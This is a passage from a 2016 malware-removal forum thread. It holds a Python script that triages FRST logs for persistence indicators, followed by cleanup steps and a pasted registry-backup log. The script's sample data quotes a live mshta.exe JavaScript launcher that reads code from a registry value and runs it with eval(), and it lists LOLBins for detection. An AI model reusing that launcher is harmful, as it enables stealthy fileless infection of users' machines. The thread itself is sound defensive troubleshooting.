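# plus three benign control lines (ExampleUpdater, Example.lnk, C:\FRST).
SAMPLE_LOG = r'''
2016-08-08 10:39 - 2016-08-08 10:49 - 00000000 ____D C:\FRST
2016-07-15 11:27 - 2016-08-06 18:19 - 00000000 ____D C:\Users\Greg\AppData\Local\a82409
2016-07-15 11:27 - 2016-07-15 11:27 - 00000000 ____D C:\Users\Greg\AppData\Roaming\f08b1d
HKU\S-1-5-21-56867686-1103405722-4171089578-1000\...\Run: [**cfdcc<*>] => "C:\Users\Greg\AppData\Local\a82409\63a99d.lnk" <===== ATTENTION (Value Name with invalid characters)
HKLM\...\Run: [ExampleUpdater] => C:\Program Files\Example\updater.exe
Startup: C:\Users\Greg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\df1157.lnk [2016-08-06]
ShortcutTarget: df1157.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
ShortcutTarget: Example.lnk -> C:\Program Files\Example\example.exe ()
U3 idsvc; no ImagePath
HKU\S-1-5-21-56867686-1103405722-4171089578-1000\Software\Classes\b60943: "C:\WINDOWS\system32\mshta.exe" "javascript:JpF0uO8C="1Z";JY2=new ActiveXObject("WScript.Shell");HRZ4b8P="6";M7Hm0H=JY2.RegRead("HKCU\\software\\isikjeeris\\xiyj");yej7u0l="MobpLa44";eval(M7Hm0H);hXOb3M8Tz="lnlLm";" <===== ATTENTION
'''

# One FRST file-listing line: created - modified - size attrs [(company)] path
FILE_RE = re.compile(r'^\d{4}-\d\d-\d\d \d\d:\d\d - \d{4}-\d\d-\d\d \d\d:\d\d - \d{8} '
                     r'(?P<attrs>\S+) (?:\([^)]*\) )?(?P<path>.+)$')
RUN_RE = re.compile(r'\\Run: \[(?P<name>[^\]]*)\] => (?P<target>.*)$')
SHORTCUT_RE = re.compile(r'^ShortcutTarget: (?P<lnk>.+?) -> (?P<target>.+?)(?: \([^)]*\))?$')
NO_IMAGE_RE = re.compile(r'^U\d+ (?P<svc>[^;]+); no ImagePath$')
REGREAD_RE = re.compile(r'RegRead\("([^"]+)"\)')
HEX_DIR_RE = re.compile(r'\\AppData\\(?:Local|Roaming)\\[0-9a-f]{6}(?:\\|$)', re.IGNORECASE)
SAFE_NAME_RE = re.compile(r'^[\w .()-]+$')   # empty or unprintable names fail this
# Signed Windows binaries a Startup shortcut has no business pointing at directly.
LOLBINS = {'cmd.exe', 'mshta.exe', 'wscript.exe', 'cscript.exe',
           'powershell.exe', 'regsvr32.exe', 'rundll32.exe'}


@dataclass(frozen=True)
class Finding:
    kind: str
    evidence: str
    detail: str


def _strip_marker(text):
    """Drop FRST's trailing '<===== ATTENTION ...' annotation and surrounding quotes."""
    return text.split('<=====')[0].strip().strip('"')


def triage(log_text):
    """Return one Finding per indicator hit; a single line may produce several."""
    findings = []
    for raw in log_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if (m := FILE_RE.match(line)) and HEX_DIR_RE.search(m['path']):
            findings.append(Finding('random_hex_appdata_dir', line, m['path']))
        if m := RUN_RE.search(line):
            name, target = m['name'], _strip_marker(m['target'])
            if not SAFE_NAME_RE.match(name):
                findings.append(Finding('run_value_unprintable_name', line, f'name={name!r}'))
            if target.lower().endswith('.lnk') or HEX_DIR_RE.search(target):
                findings.append(Finding('run_value_lnk_in_random_dir', line, f'target={target}'))
        if m := SHORTCUT_RE.match(line):
            exe = m['target'].rsplit('\\', 1)[-1].lower()
            if exe in LOLBINS:
                findings.append(Finding('startup_lnk_to_lolbin', line, f'{m["lnk"]} -> {exe}'))
        if m := NO_IMAGE_RE.match(line):
            findings.append(Finding('service_without_imagepath', line, m['svc']))
        low = line.lower()
        if 'mshta.exe' in low and 'javascript:' in low:
            # The JS source is quoted inside the log, so its backslashes are doubled.
            keys = [k.replace('\\\\', '\\') for k in REGREAD_RE.findall(line)]
            detail = ('payload read from ' + ', '.join(keys)) if keys else 'inline script'
            if 'eval(' in low:
                detail += '; eval() of registry data'
            findings.append(Finding('registry_script_loader', line, detail))
    return findings


def summarize(findings):
    """Count findings per indicator kind."""
    return dict(Counter(f.kind for f in findings))


if __name__ == '__main__':
    for f in triage(SAMPLE_LOG):
        print(f'[{f.kind}] {f.detail}')
        print(f'    {f.evidence[:100]}')
```

The last check is the one worth keeping in mind when reusing the fixlist above: the mshta.exe line only names where the payload lives (the RegRead() target, here HKCU\software\isikjeeris\xiyj). The fixlist deletes the launcher under Software\Classes, the Run value, the Startup shortcuts and the a82409 folder, but contains no line for that value, so the script reports its path separately for the reviewer to decide on.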

#3 Gregbc1976 (Topic Starter)
Posted 09 August 2016 - 11:43 AM

Nasdaq,

First, thanks for the help.

I ran FRST with the file you provided. UNFORTUNATELY I did not run it as admin (I apologize).

The machine automatically rebooted and the microphone problem seems to be solved.

Also, regsvr32 is not running.

However, IE 11 is extremely slow (I was unable to update Java) and I was unable to launch Edge. I am using Chrome to post this.

Attached is fixlog.txt.

I'll wait for further instructions.

Thanks again


#4 nasdaq
Malware Response Team, Montreal, QC. Canada
Posted 09 August 2016 - 12:42 PM

Reset Internet Explorer:
Menu > Tools > Internet Options > Advanced Tab.
Click the Reset button on the bottom of the pane.
Click the Apply button.
Close IE.


Clean the Internet Explorer Cache.
https://kb.wisc.edu/page.php?id=15141
=

Restart the computer normally when done.

How is it now?

#5 Gregbc1976 (Topic Starter)
Posted 09 August 2016 - 01:27 PM

Reset done.

Cleared cache (FYI, https://kb.wisc.edu/page.php?id=15141 gives a "Page not found").

IE is a little better.

Cannot download Java: when I select the "Agree and start free download" button the page just reloads.

The Windows key and left-clicking the Start button do not work, and the Edge icon is gone from the task bar.

Microphone is still working and no regsvr32.


#6 nasdaq
Malware Response Team, Montreal, QC. Canada
Posted 10 August 2016 - 07:29 AM

Clean your Java cache.
https://www.java.com/en/download/help/plugin_cache.xml

Use Firefox to update Java.

===

Please Download Tweaking.com - Windows Repair from Here
  • Install and then run the program
  • Execute the instructions on Step 1 Important
  • Click Next on Step 2 Optional, do the Pre Scan, skip Step 3 and 4 Optional for now.
  • On Step 5 Backup System Restore do a Registry backup. When you have completed this click Next
  • Click Repairs - Open Repairs in the bottom right corner
  • Uncheck the All repair button then select just the item(s) listed below:
    07 - Repair Internet Explorer
    11 - Repair Start Menu Icons Removed by Infections
    12 - Repair Icons
    20 - Repair Windows Sidebar/Gadgets
    22 - Repair Windows Snipping tool
    28.01 - Repair Windows 8/10 Apps Store
    28.02 - Repair Windows 8/10 Apps Store (Completely Reset Apps Store)
    29 - Repair Windows 8/10 Component Store
    30 - Repair Windows 8/10 COM+ Unmarshalers
    33 - Repair Performance Counters
  • Click the Start button and let the process run to completion. Copy any error messages into Notepad, Save it on your Desktop. (Reboot if asked to do so)
  • Please copy and paste the Contents of this file on your next reply.

===


#7 Gregbc1976 (Topic Starter)
Posted 10 August 2016 - 02:26 PM

I wanted to check with you before proceeding. I got an error in step 5 backing up the registry:

"The last scheduled backup had errors or failed"

Backup Location: C:\regBackup\Greg-hp\8.10.2016_3.06.23pm

I ran it twice and got the same result.

There is a file named dos_restore in the directory, file type Windows Command script.

The following is a copy and paste of the 3 txt files in that directory.

Backup_info

Computer: GREG-HP (Windows 10 Home (64-bit) 10.0.10586 )
Windows Repair Auto Backup
Total Size: 163.91 MB
 
LOG_Backup
[8/10/2016 - 3:06:23 PM] System Variables
[8/10/2016 - 3:06:23 PM] --------------------------------------------------------------------------------
[8/10/2016 - 3:06:23 PM] Use Fallback Backup Method: 1 (0 = No, 1 = Yes)
[8/10/2016 - 3:06:23 PM] VSS exe To Use: vss_7_8_2008_2012_64.exe
[8/10/2016 - 3:06:23 PM] Windows Drive: C:
[8/10/2016 - 3:06:23 PM] Windows Folder: WINDOWS
[8/10/2016 - 3:06:23 PM] Windows Path: C:\WINDOWS
[8/10/2016 - 3:06:23 PM] Registry File Location: C:\WINDOWS\System32\Config
[8/10/2016 - 3:06:23 PM] Current Profile: C:\Users\Greg Main Acct
[8/10/2016 - 3:06:23 PM] Current Profile SID: S-1-5-21-56867686-1103405722-4171089578-1004
[8/10/2016 - 3:06:23 PM] Current Profile Classes: S-1-5-21-56867686-1103405722-4171089578-1004_Classes
[8/10/2016 - 3:06:23 PM] Profiles Location: C:\Users
[8/10/2016 - 3:06:23 PM] Profiles Location 2: C:\WINDOWS\ServiceProfiles
[8/10/2016 - 3:06:23 PM] Local Settings AppData: AppData\Local
[8/10/2016 - 3:06:23 PM] Computer Name: GREG-HP
[8/10/2016 - 3:06:23 PM] OS: Windows 10 Home (64-bit)
[8/10/2016 - 3:06:23 PM] OS Architecture: 64-bit
[8/10/2016 - 3:06:23 PM] OS Version: 10.0.10586
[8/10/2016 - 3:06:23 PM] OS Service Pack: 
[8/10/2016 - 3:06:23 PM] --------------------------------------------------------------------------------
 
[8/10/2016 - 3:06:23 PM] Backup Location: C:\RegBackup\
 
[8/10/2016 - 3:06:23 PM] Silent command given, program will close after backup.
 
[8/10/2016 - 3:06:23 PM] Auto Delete Old Backups Enabled, Working...
[8/10/2016 - 3:06:23 PM] Delete backups 7 Days or older. Keep at least 5 Backups.
[8/10/2016 - 3:06:23 PM] --------------------------------------------------------------------------------
[8/10/2016 - 3:06:23 PM] --------------------------------------------------------------------------------
 
[8/10/2016 - 3:06:23 PM] Starting Backup...
 
[8/10/2016 - 3:06:23 PM] Files To Backup: 
[8/10/2016 - 3:06:23 PM] --------------------------------------------------------------------------------
[8/10/2016 - 3:06:23 PM] C:\WINDOWS\System32\Config\components
[8/10/2016 - 3:06:23 PM] C:\WINDOWS\System32\Config\drivers
[8/10/2016 - 3:06:23 PM] C:\WINDOWS\System32\Config\default
[8/10/2016 - 3:06:23 PM] C:\WINDOWS\System32\Config\sam
[8/10/2016 - 3:06:23 PM] C:\WINDOWS\System32\Config\security
[8/10/2016 - 3:06:23 PM] C:\WINDOWS\System32\Config\software
[8/10/2016 - 3:06:23 PM] C:\WINDOWS\System32\Config\system
[8/10/2016 - 3:06:23 PM] C:\Users\Default\ntuser.dat
[8/10/2016 - 3:06:23 PM] C:\Users\DefaultAppPool\ntuser.dat
[8/10/2016 - 3:06:23 PM] C:\Users\DefaultAppPool\AppData\Local\Microsoft\Windows\UsrClass.dat
[8/10/2016 - 3:06:23 PM] C:\Users\Greg\ntuser.dat
[8/10/2016 - 3:06:23 PM] C:\Users\Greg\AppData\Local\Microsoft\Windows\UsrClass.dat
[8/10/2016 - 3:06:23 PM] C:\Users\Greg Main Acct\ntuser.dat
[8/10/2016 - 3:06:23 PM] C:\Users\Greg Main Acct\AppData\Local\Microsoft\Windows\UsrClass.dat
[8/10/2016 - 3:06:23 PM] C:\Users\LogMeInRemoteUser\ntuser.dat
[8/10/2016 - 3:06:23 PM] C:\Users\LogMeInRemoteUser\AppData\Local\Microsoft\Windows\UsrClass.dat
[8/10/2016 - 3:06:23 PM] C:\WINDOWS\ServiceProfiles\LocalService\ntuser.dat
[8/10/2016 - 3:06:23 PM] C:\WINDOWS\ServiceProfiles\NetworkService\ntuser.dat
[8/10/2016 - 3:06:23 PM] --------------------------------------------------------------------------------
 
[8/10/2016 - 3:06:23 PM] Backing Up Registry Files Security Descriptors (SDDL): 
[8/10/2016 - 3:06:23 PM] --------------------------------------------------------------------------------
[8/10/2016 - 3:06:23 PM] "\\?\C:\Users\Default\ntuser.dat",1,"O:BAG:BAD:AR(A;;FA;;;BA)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;0x1200a9;;;BU)"
"\\?\C:\Users\Default\ntuser.dat.old",1,"O:BAG:BAD:AR(A;;FA;;;BA)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;0x1200a9;;;BU)"
"\\?\C:\Users\DefaultAppPool\AppData\Local\Microsoft\Windows\UsrClass.dat",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415)"
"\\?\C:\Users\DefaultAppPool\AppData\Local\Microsoft\Windows\UsrClass.dat.old",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415)"
"\\?\C:\Users\DefaultAppPool\ntuser.dat",1,"O:S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415G:S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415D:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415)"
"\\?\C:\Users\DefaultAppPool\ntuser.dat.old",1,"O:S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415G:S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415D:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415)"
"\\?\C:\Users\Greg Main Acct\AppData\Local\Microsoft\Windows\UsrClass.dat",1,"O:SYG:SYD:AIAR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1004)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\Greg Main Acct\AppData\Local\Microsoft\Windows\UsrClass.dat.old",1,"O:SYG:SYD:AIAR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1004)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\Greg Main Acct\ntuser.dat",1,"O:S-1-5-21-56867686-1103405722-4171089578-1004G:S-1-5-21-56867686-1103405722-4171089578-513D:AIAR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1004)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\Greg Main Acct\ntuser.dat.old",1,"O:S-1-5-21-56867686-1103405722-4171089578-1004G:S-1-5-21-56867686-1103405722-4171089578-513D:AIAR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1004)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\Greg\AppData\Local\Microsoft\Windows\UsrClass.dat",1,"O:SYG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\Greg\AppData\Local\Microsoft\Windows\UsrClass.dat.old",1,"O:SYG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\Greg\ntuser.dat",1,"O:S-1-5-21-56867686-1103405722-4171089578-1000G:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\Greg\ntuser.dat.old",1,"O:S-1-5-21-56867686-1103405722-4171089578-1000G:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\LogMeInRemoteUser\AppData\Local\Microsoft\Windows\UsrClass.dat",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1003)"
"\\?\C:\Users\LogMeInRemoteUser\AppData\Local\Microsoft\Windows\UsrClass.dat.old",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1003)"
"\\?\C:\Users\LogMeInRemoteUser\ntuser.dat",1,"O:BAG:S-1-5-21-56867686-1103405722-4171089578-513D:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1003)"
"\\?\C:\Users\LogMeInRemoteUser\ntuser.dat.old",1,"O:BAG:S-1-5-21-56867686-1103405722-4171089578-513D:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1003)"
"\\?\C:\WINDOWS\ServiceProfiles\LocalService\ntuser.dat",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;LS)"
"\\?\C:\WINDOWS\ServiceProfiles\LocalService\ntuser.dat.old",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;LS)"
"\\?\C:\WINDOWS\ServiceProfiles\NetworkService\ntuser.dat",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;NS)"
"\\?\C:\WINDOWS\ServiceProfiles\NetworkService\ntuser.dat.old",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;NS)"
"\\?\C:\WINDOWS\System32\Config\components",1,"O:BAG:BAD:AR(A;;FA;;;BA)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;0x1200a9;;;BU)"
"\\?\C:\WINDOWS\System32\Config\components.old",1,"O:BAG:BAD:AR(A;;FA;;;BA)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;0x1200a9;;;BU)"
"\\?\C:\WINDOWS\System32\Config\default",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\default.old",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\drivers",1,"O:BAG:BAD:AR(A;;FA;;;BA)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;0x1200a9;;;BU)"
"\\?\C:\WINDOWS\System32\Config\drivers.old",1,"O:BAG:BAD:AR(A;;FA;;;BA)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;0x1200a9;;;BU)"
"\\?\C:\WINDOWS\System32\Config\sam",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\sam.old",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\security",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\security.old",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\software",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\software.old",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\system",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\system.old",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
 
[8/10/2016 - 3:06:23 PM] --------------------------------------------------------------------------------
 
[8/10/2016 - 3:06:23 PM] Backing Up Files: 
[8/10/2016 - 3:06:23 PM] --------------------------------------------------------------------------------
[8/10/2016 - 3:06:23 PM] Using Fallback Backup Method.
 
[8/10/2016 - 3:06:23 PM] Backing Up File: C:\WINDOWS\System32\Config\components
[8/10/2016 - 3:06:24 PM] Result: Successful (34.63 MB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\WINDOWS\System32\Config\components
 
[8/10/2016 - 3:06:24 PM] Backing Up File: C:\WINDOWS\System32\Config\drivers
[8/10/2016 - 3:06:24 PM] Result: Successful (5.10 MB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\WINDOWS\System32\Config\drivers
 
[8/10/2016 - 3:06:24 PM] Backing Up File: C:\WINDOWS\System32\Config\default
[8/10/2016 - 3:06:24 PM] Result: Successful (364.00 KB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\WINDOWS\System32\Config\default
 
[8/10/2016 - 3:06:24 PM] Backing Up File: C:\WINDOWS\System32\Config\sam
[8/10/2016 - 3:06:24 PM] Result: Successful (64.00 KB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\WINDOWS\System32\Config\sam
 
[8/10/2016 - 3:06:24 PM] Backing Up File: C:\WINDOWS\System32\Config\security
[8/10/2016 - 3:06:24 PM] Result: Successful (28.00 KB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\WINDOWS\System32\Config\security
 
[8/10/2016 - 3:06:24 PM] Backing Up File: C:\WINDOWS\System32\Config\software
[8/10/2016 - 3:06:25 PM] Result: Successful (93.04 MB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\WINDOWS\System32\Config\software
 
[8/10/2016 - 3:06:25 PM] Backing Up File: C:\WINDOWS\System32\Config\system
[8/10/2016 - 3:06:26 PM] Result: Successful (15.80 MB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\WINDOWS\System32\Config\system
 
[8/10/2016 - 3:06:26 PM] Backing Up File: C:\Users\Default\ntuser.dat
[8/10/2016 - 3:06:26 PM] Result: Successful (256.00 KB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\Users\Default\ntuser.dat
 
[8/10/2016 - 3:06:26 PM] Backing Up File: C:\Users\DefaultAppPool\ntuser.dat
[8/10/2016 - 3:06:26 PM] Result: Successful (256.00 KB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\Users\DefaultAppPool\ntuser.dat
 
[8/10/2016 - 3:06:26 PM] Backing Up File: C:\Users\DefaultAppPool\AppData\Local\Microsoft\Windows\UsrClass.dat
[8/10/2016 - 3:06:26 PM] Result: Successful (8.00 KB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\Users\DefaultAppPool\AppData\Local\Microsoft\Windows\UsrClass.dat
 
[8/10/2016 - 3:06:26 PM] Backing Up File: C:\Users\Greg\ntuser.dat
[8/10/2016 - 3:06:26 PM] Result: Failed - Error: -1 (API Reg Save Failed (), Tried File Copy, File In use, Cannot copy.)
 
[8/10/2016 - 3:06:26 PM] Backing Up File: C:\Users\Greg\AppData\Local\Microsoft\Windows\UsrClass.dat
[8/10/2016 - 3:06:26 PM] Result: Successful (7.75 MB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\Users\Greg\AppData\Local\Microsoft\Windows\UsrClass.dat
 
[8/10/2016 - 3:06:26 PM] Backing Up File: C:\Users\Greg Main Acct\ntuser.dat
[8/10/2016 - 3:06:26 PM] Result: Successful (944.00 KB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\Users\Greg Main Acct\ntuser.dat
 
[8/10/2016 - 3:06:26 PM] Backing Up File: C:\Users\Greg Main Acct\AppData\Local\Microsoft\Windows\UsrClass.dat
[8/10/2016 - 3:06:26 PM] Result: Successful (3.35 MB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\Users\Greg Main Acct\AppData\Local\Microsoft\Windows\UsrClass.dat
 
[8/10/2016 - 3:06:26 PM] Backing Up File: C:\Users\LogMeInRemoteUser\ntuser.dat
[8/10/2016 - 3:06:27 PM] Result: Successful (1.75 MB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\Users\LogMeInRemoteUser\ntuser.dat
 
[8/10/2016 - 3:06:27 PM] Backing Up File: C:\Users\LogMeInRemoteUser\AppData\Local\Microsoft\Windows\UsrClass.dat
[8/10/2016 - 3:06:27 PM] Result: Successful (256.00 KB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\Users\LogMeInRemoteUser\AppData\Local\Microsoft\Windows\UsrClass.dat
 
[8/10/2016 - 3:06:27 PM] Backing Up File: C:\WINDOWS\ServiceProfiles\LocalService\ntuser.dat
[8/10/2016 - 3:06:27 PM] Result: Successful (180.00 KB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\WINDOWS\ServiceProfiles\LocalService\ntuser.dat
 
[8/10/2016 - 3:06:27 PM] Backing Up File: C:\WINDOWS\ServiceProfiles\NetworkService\ntuser.dat
[8/10/2016 - 3:06:27 PM] Result: Successful (180.00 KB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\WINDOWS\ServiceProfiles\NetworkService\ntuser.dat
 
[8/10/2016 - 3:06:27 PM] Total Size: 163.91 MB
 
[8/10/2016 - 3:06:27 PM] --------------------------------------------------------------------------------
 
[8/10/2016 - 3:06:27 PM] Creating DOS restore bat file for use in the Windows Recovery Console: 
[8/10/2016 - 3:06:27 PM] --------------------------------------------------------------------------------
[8/10/2016 - 3:06:27 PM] Already Exists: C:\WINDOWS\tweaking.com-regbackup-GREG-HP-Windows-10-Home-(64-bit).dat for use in the dos_restore.cmd file
[8/10/2016 - 3:06:27 PM] Done: C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\dos_restore.cmd
[8/10/2016 - 3:06:27 PM] --------------------------------------------------------------------------------
 
 
SDDL
"\\?\C:\Users\Default\ntuser.dat",1,"O:BAG:BAD:AR(A;;FA;;;BA)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;0x1200a9;;;BU)"
"\\?\C:\Users\Default\ntuser.dat.old",1,"O:BAG:BAD:AR(A;;FA;;;BA)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;0x1200a9;;;BU)"
"\\?\C:\Users\DefaultAppPool\AppData\Local\Microsoft\Windows\UsrClass.dat",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415)"
"\\?\C:\Users\DefaultAppPool\AppData\Local\Microsoft\Windows\UsrClass.dat.old",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415)"
"\\?\C:\Users\DefaultAppPool\ntuser.dat",1,"O:S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415G:S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415D:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415)"
"\\?\C:\Users\DefaultAppPool\ntuser.dat.old",1,"O:S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415G:S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415D:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415)"
"\\?\C:\Users\Greg Main Acct\AppData\Local\Microsoft\Windows\UsrClass.dat",1,"O:SYG:SYD:AIAR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1004)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\Greg Main Acct\AppData\Local\Microsoft\Windows\UsrClass.dat.old",1,"O:SYG:SYD:AIAR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1004)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\Greg Main Acct\ntuser.dat",1,"O:S-1-5-21-56867686-1103405722-4171089578-1004G:S-1-5-21-56867686-1103405722-4171089578-513D:AIAR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1004)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\Greg Main Acct\ntuser.dat.old",1,"O:S-1-5-21-56867686-1103405722-4171089578-1004G:S-1-5-21-56867686-1103405722-4171089578-513D:AIAR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1004)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\Greg\AppData\Local\Microsoft\Windows\UsrClass.dat",1,"O:SYG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\Greg\AppData\Local\Microsoft\Windows\UsrClass.dat.old",1,"O:SYG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\Greg\ntuser.dat",1,"O:S-1-5-21-56867686-1103405722-4171089578-1000G:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\Greg\ntuser.dat.old",1,"O:S-1-5-21-56867686-1103405722-4171089578-1000G:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\LogMeInRemoteUser\AppData\Local\Microsoft\Windows\UsrClass.dat",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1003)"
